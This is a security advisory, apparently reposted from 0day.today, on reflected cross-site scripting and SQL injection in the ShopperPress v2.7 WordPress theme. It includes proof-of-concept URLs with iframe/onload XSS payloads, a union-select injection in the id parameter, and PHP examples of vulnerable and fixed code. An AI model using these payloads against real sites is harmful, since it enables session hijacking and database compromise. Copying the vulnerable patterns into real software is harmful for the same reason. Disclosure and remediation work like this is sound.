WordPress ShopperPress v2.7 Cross Site Scripting / SQL Injection

Published: 11 Aug 2012 | Reported by: n/a | Type: zdt | Source: 0day.today

ShopperPress v2.7 WordPress - Cross Site Scripting / SQL Injection vulnerabilities

ShopperPress v2.7 WordPress - Cross Site Vulnerabilities

Details:
========
Multiple non-persistent cross-site scripting vulnerabilities were detected in the ShopperPress Premium WordPress Theme and Addon v2.7.
The vulnerabilities allow remote attackers to hijack website customer, moderator or admin sessions; exploitation requires medium or high user
interaction. The bugs are located on the client side in the search and edit modules, in the bound vulnerable id, search and order parameters.
Successful exploitation can result in WordPress application account theft, client-side phishing and client-side content request manipulation.
Exploitation requires medium or high user interaction and does not require a privileged web application user account.

Vulnerable Module(s):
        [+] Search
        [+] Page&Edit

Vulnerable Parameter(s):
        [+] search
        [+] id
        [+] order


Proof of Concept:
=================
The non-persistent cross-site scripting vulnerabilities can be exploited by remote attackers with medium or high required user interaction
and without a privileged user account. For demonstration or reproduction ...

PoC:
http://shopperpress.127.0.0.1:38/wp-admin/admin.php
?page=images&p=0&search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C

http://shopperpress.127.0.0.1:38/wp-admin/admin.php
?page=emails&edit=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C

http://shopperpress.127.0.0.1:38/wp-admin/admin.php
?page=members&edit&order=0%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C


Review: File Manager

<fieldset style="padding:0px;">
<h2 style="float:left; padding-left:5px;">"><[CLIENT SIDE MALICIOUS SCRIPT CODE])" width="800">
<form method="get" name="SearchForm" action="admin.php" 
style="padding:5px; float:right;">
<input type="hidden" name="page" value="images" />
<input type="hidden" name="p" value="0" />
<input name="search" type="text" class="ppt-forminput" 
id="search">
<input type="submit" style="font-size:16px; background:#efefef; 
color:#666;padding:5px;" value="Search Files">
</form>
<div class="clearfix"></div>
<form class="plain" method="post" name="orderform" id="orderform">
<input type="hidden" name="deleteimages" value="1">
Review: Member Add/Edit Listing

<ul>
<li><a rel="premiumpress_tab1" href="#" class="active">Details</a></li>
<li><a href="#" onclick="window.location.href='admin.php
?page=orders&cid=5"><[CLIENT SIDE MALICIOUS SCRIPT CODE])" 
width="800">Order History</a></li>
<!--<li><a href="admin.php?page=members">Search Results</a></li>-->
</ul>
</div>
<div id="videobox1"></div>
<form method="post" target="_self" enctype="multipart/form-data">
<input name="action" type="hidden" value="edit" />
<input name="userdata[ID]" type="hidden" value="5"><[CLIENT SIDE MALICIOUS SCRIPT CODE]") <" />
<input type="hidden" value="" name="showThisTab" id="showThisTab" />
<div id="premiumpress_tab1" class="content">


Review: EMail Add/Edit

<div id="premiumpress_tab1" class="content">
<form class="fields" method="post" target="_self" enctype="multipart/form-data">
<input name="action" value="edit" type="hidden">
<input name="ID" value="" 
type="hidden"><[CLIENT SIDE MALICIOUS SCRIPT CODE];)" width="800">
<input type="hidden" name="form[email_type]" value="email" />
<fieldset>
<div class="titleh"><h3>Email Options</h3></div>


Solution:
=========
The vulnerabilities can be patched by parsing the order, id and search web application parameters.
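As an added illustration of that fix (example code, not ShopperPress's own), the reflected pattern behind the file manager's search field beside a hardened form. It assumes the WordPress helpers wp_unslash(), esc_attr() and esc_html() are loaded; the "Results for" heading is a hypothetical stand-in for the page's own h2.

```php
<?php
// Added example, not ShopperPress code: the reflected-XSS pattern behind the
// file manager's "search" parameter beside a hardened form. Assumes the
// WordPress helpers wp_unslash(), esc_attr() and esc_html() are loaded.

// Vulnerable: the raw request value is echoed into an attribute. A value
// beginning with "> closes the attribute and the tag, which is exactly what
// the review excerpts above show.
function render_search_unsafe( array $get ) {
    $search = isset( $get['search'] ) ? $get['search'] : '';
    return '<input name="search" type="text" id="search" value="' . $search . '">';
}

// Hardened: encode for the context the value lands in. esc_attr() for
// attribute values, esc_html() for element text (such as a results heading);
// both turn the quote and angle brackets the payload relies on into
// &quot;, &lt; and &gt;, so the browser renders text, not a new element.
function render_search_safe( array $get ) {
    $search  = isset( $get['search'] ) ? wp_unslash( $get['search'] ) : '';
    $heading = '<h2>Results for: ' . esc_html( $search ) . '</h2>';
    $input   = '<input name="search" type="text" id="search" value="'
             . esc_attr( $search ) . '">';
    return $heading . "\n" . $input;
}

// The id/order parameters are numeric identifiers: coerce them before they
// are echoed or used anywhere, rather than trusting the request string.
function sanitize_record_id( $raw ) {
    return absint( $raw );
}

// Constructed request mirroring the shape of the advisory's payload.
$request = array( 'search' => '"><iframe src=http://example.invalid>' );
echo render_search_safe( $request ), "\n";
```

The same context-specific escaping applies wherever the edit and order parameters are reflected in the Member and EMail screens reviewed above.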


Risk:
=====
The security risk of the non-persistent cross-site scripting vulnerabilities is estimated as medium(-).

Details:
========
A SQL injection vulnerability was detected in the official ShopperPress Premium WordPress Theme and Addon v2.7.
Remote attackers with privileged user accounts and module access can inject and execute their own SQL commands to compromise
the WordPress application DBMS. The vulnerability is located in the listing module, in the bound vulnerable
id parameter. Exploitation requires a privileged user account or module access rights.

Vulnerable Module(s):
        [+] Listing - [Edit]

Vulnerable Parameter(s):    
        [+] ID


Proof of Concept:
=================
The SQL injection vulnerability can be exploited by a privileged WordPress user account without user interaction. For demonstration or reproduction ...

PoC:
http://shopperpress.127.0.0.1:38/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]--

--- SQL Exception Logs ---
 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '[SQL-INJECTION!]' GROUP BY order_id LIMIT 1' at line 1 on line: 80


Solution:
=========
The vulnerability can be patched by parsing the id parameter of the edit functions in the addon module files.
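As an added illustration of that fix (example code, not ShopperPress's own), the order-lookup pattern behind the listing module's id parameter beside a hardened form. It assumes the global WordPress $wpdb object and a hypothetical table {$wpdb->prefix}orders with an integer order_id column; the capability name is also an assumption.

```php
<?php
// Added example, not ShopperPress code: the order-lookup pattern behind the
// listing module's "id" parameter beside a hardened form. Assumes the global
// WordPress $wpdb object and a hypothetical table {$wpdb->prefix}orders with
// an integer order_id column.

// Vulnerable: the request value is interpolated into the SQL string. A single
// quote in the value ends the literal, so whatever follows is parsed as SQL;
// the advisory's MySQL error shows the tail of exactly this query shape.
function get_order_unsafe( $wpdb, $raw_id ) {
    $sql = "SELECT * FROM {$wpdb->prefix}orders WHERE order_id = '" . $raw_id
         . "' GROUP BY order_id LIMIT 1";
    return $wpdb->get_row( $sql );
}

// Hardened: the id is numeric, so coerce it first and then bind it through
// $wpdb->prepare(); %d is substituted with an integer, never a raw string.
function get_order_safe( $wpdb, $raw_id ) {
    $id = absint( $raw_id );   // the advisory's "5-261343282-1'union ..." collapses to 5
    if ( 0 === $id ) {
        return null;           // missing or non-numeric id: do not query at all
    }
    return $wpdb->get_row( $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}orders WHERE order_id = %d LIMIT 1",
        $id
    ) );
}

// The edit screen should also gate on capability, since the advisory notes
// the path is reachable by privileged accounts. 'manage_options' is an
// assumption for a hypothetical admin-only orders screen.
function order_edit_allowed() {
    return is_user_logged_in() && current_user_can( 'manage_options' );
}

// Constructed request value mirroring the advisory's payload shape.
if ( order_edit_allowed() ) {
    $order = get_order_safe( $GLOBALS['wpdb'], "5-261343282-1'union select" );
}
```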


Risk:
=====
The security risk of the SQL injection vulnerability is estimated as high(-).



#  0day.today [2018-04-10]  #
